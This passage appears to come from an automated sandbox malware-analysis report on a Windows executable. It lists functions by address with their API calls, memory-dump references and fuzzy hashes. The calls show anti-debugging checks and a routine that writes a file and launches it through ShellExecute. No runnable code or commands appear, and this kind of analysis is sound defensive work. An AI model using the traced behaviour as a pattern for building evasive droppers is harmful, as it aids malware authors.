                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-2367923768
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7ad0a5e0a19d6908a1b5d0c9f3069fd8dff88d95ab9e26a6fcc342cc977d31c6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d01d9eff68ecd31de0533e2df8f3f37b43721f67b3e7b3e1968c248114d09aee
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ad0a5e0a19d6908a1b5d0c9f3069fd8dff88d95ab9e26a6fcc342cc977d31c6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11D012A23507911DFE0073F42CD4999038EC95452D7300E76B027C77D2F5A6CC1D5064
                                                                                                                                                                                                                                                                                                                                  Function 02DBC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,02DDD10B,00000000,02DDD11E), ref: 02DBC47A
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02DBC48B
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 82b11f205908c129d988789bfe8d6d081f6350f43551b8de787b5f598499fa85
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 30b7caee9520412386340a5bf6f7cd232fcd1c37cf6b1895ecd7e9ec9a51fdd9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82b11f205908c129d988789bfe8d6d081f6350f43551b8de787b5f598499fa85
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAD05EA1A91744DEF602AAB1A4A4AB22398EF88310F004866F40389300E7A2AD148F64
                                                                                                                                                                                                                                                                                                                                  Function 02DBE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DBE297
                                                                                                                                                                                                                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DBE2B3
                                                                                                                                                                                                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DBE32A
                                                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 02DBE353
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 920484758-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a4fbaa352ea35373a8850cda3096cb631129ef3cfbfcec6419790055c908b547
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1441FB75A01229DFCB66DB58CCA0BC9B3BDEF49314F4042D5E54AA7312DA34AF818F60
                                                                                                                                                                                                                                                                                                                                  Function 02DBAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DBAD59
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DBAD7D
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(02DB0000,?,00000105), ref: 02DBAD98
                                                                                                                                                                                                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DBAE2E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a0d46f0df53951f76a9543f95a973e30d2bae720fd60f19216ccc1813531181d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9cf1641c34f14f32ba02b7eff23c9c4fa17c32520375284aaaff5c1313fa9951
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0d46f0df53951f76a9543f95a973e30d2bae720fd60f19216ccc1813531181d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3411B75A40258DBDB22DB68CC94BDAB7FDAF08301F4400E6A549E7341D7709F848F60
                                                                                                                                                                                                                                                                                                                                  Function 02DBAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DBAD59
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DBAD7D
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(02DB0000,?,00000105), ref: 02DBAD98
                                                                                                                                                                                                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DBAE2E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b5ba093c0329de98d5dbb451ac30612b9acf586cdc79fa9978f5362bd25377a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 812feeecd1d7b6629f76eee262bbcde0268f26eb04538ea08e90f2a56f1852c1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b5ba093c0329de98d5dbb451ac30612b9acf586cdc79fa9978f5362bd25377a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88412B74A40258DBDB22DB68CC94BDAB7FDAF08301F4400E5A549E7341DB709F848FA0
                                                                                                                                                                                                                                                                                                                                  Function 02DB1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5dcb1184ad0b6b07c94b4b3e8e3039c6894b215ced635ccb15de6b3a73381e16
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: da9c436ff5add023a4997114987df18eda3ea0e66eaf30d40c1c286611400f00
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5dcb1184ad0b6b07c94b4b3e8e3039c6894b215ced635ccb15de6b3a73381e16
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0A1E4A67106048BD71AAA7D9CB43EDB3D2DF85225F28423EE11ECB3C1DB68CD45C660
                                                                                                                                                                                                                                                                                                                                  Function 02DB94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02DB95DA), ref: 02DB9572
                                                                                                                                                                                                                                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02DB95DA), ref: 02DB9578
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                                                                                                                                  • String ID: yyyy
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 142e2322d3f057634ab909492e7c4b8692c16fee78897a99e9667bec719393aa
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d393ea06584b8791eea0aad943a85c6fd63a72d7c2969c163c353961fdf8159c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 142e2322d3f057634ab909492e7c4b8692c16fee78897a99e9667bec719393aa
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10214F71A04198DFDB12DF64C871AEA73F9EF09710F4140A5E906E7351D630EE40CEA5
                                                                                                                                                                                                                                                                                                                                  Function 02DC8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DC83C2), ref: 02DC83A4
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                                                                                                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3811539418-184458249
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cff5785828b4193164179e87d8dec5d7919f167263a5f656202cbed637630af5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 792e5612f16921c601fc5e880ce9c8f3d7ff3bc5d23a7e4d081300da9c2d07d1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cff5785828b4193164179e87d8dec5d7919f167263a5f656202cbed637630af5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B016D71680309EFEB02EFA5EC65F9AB7EDEB48B00FA15464B901D7740D670AD50AA34
                                                                                                                                                                                                                                                                                                                                  Function 02DCAF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCAF58
                                                                                                                                                                                                                                                                                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 02DCAF88
                                                                                                                                                                                                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 02DCAFA7
                                                                                                                                                                                                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCAFB3
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Read$Write
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3448952669-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 58891c96ade314b417e5d1c5876a09d7ac42534aea6cb2bf4f451feff6a0f628
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7219DB264061E9BDB11DFB9CC80BAE73A9EF80366F108555FD1497380DB34EC12CAA0

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:10%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:3.1%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:32
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:2

                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207filestringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: %s\%s
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2742963760-4073750446
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a82770f71db8e48869979fa4d59a48c1d69027196fbdec4bdf6d8a9b1bdd036
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ce340559ed643e80c0758f702ca7b046c498c1d309c8b568501c00ab43499a41
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a82770f71db8e48869979fa4d59a48c1d69027196fbdec4bdf6d8a9b1bdd036
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE7125F1E001049BDB54DB5CDC81BDE77B9EB44309F04417AF60AFB391E639AA848B59
                                                                                                                                                                                                                                                                                                                                  Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113filestringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2992075992-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1e2f484b0497d23900be518c397f8deb832c2e715262163bef3f91ab169fcff9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3ba0f7a8f6b0ede00da755a29cfea894b35039c78ebbae5d4c541c040a1a5c4d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e2f484b0497d23900be518c397f8deb832c2e715262163bef3f91ab169fcff9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 184155F0E001049BDF58DB58DC91B9E77B9DB44309F0441B9F60AFB391E538AA88CB59
                                                                                                                                                                                                                                                                                                                                  Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1611591150-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 30adea5ed2e89b665672731fce5e9ff8860a77503ba1e36038058b9968a07e75
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 27ee011044e7d5e793fd8ebd023162aebb77fc20787e11e0718a971f15838409
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30adea5ed2e89b665672731fce5e9ff8860a77503ba1e36038058b9968a07e75
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A1121F5E00104BBCB00EBACEC85F5B77ACA798304F104479F909E73A1E979EA489765
                                                                                                                                                                                                                                                                                                                                  Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
